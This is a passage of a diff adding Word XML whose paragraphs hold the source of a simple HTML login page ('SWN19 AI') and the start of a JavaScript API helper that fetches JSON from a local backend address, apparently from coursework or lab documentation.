+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        &lt;h2&gt;Please enter your name and password&lt;/h2&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>&lt;h3&gt;SWN19 AI&lt;/h3&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;div align="center"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        &lt;a&gt;Username: &lt;/a&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        &lt;input type="text" size="20" id="username"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;div align="center"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        &lt;a&gt;Password: &lt;/a&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        &lt;input type="password" size="21" id="password"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;div align="center" height="22px"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        &lt;input type="button" value="Login" style="width:50px;" id="login" /&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;/body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;script src="./aj3.js"&gt;&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;/html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>he javascript file “aj3.js” is</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>const API_URL = 'http://192.168.1.102:5000';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>const getJSON = (path, options) =&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    fetch(path, options)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        .then(res =&gt; res.json())</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        .catch(err =&gt; console.warn(`API_ERROR: ${err.message}`));</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>class API {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    constructor(url = API_URL) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        this.url = url;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    makeAPIRequest(path, options) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        return getJSON(`${this.url}/${path}`, options);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>const api  = new API();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
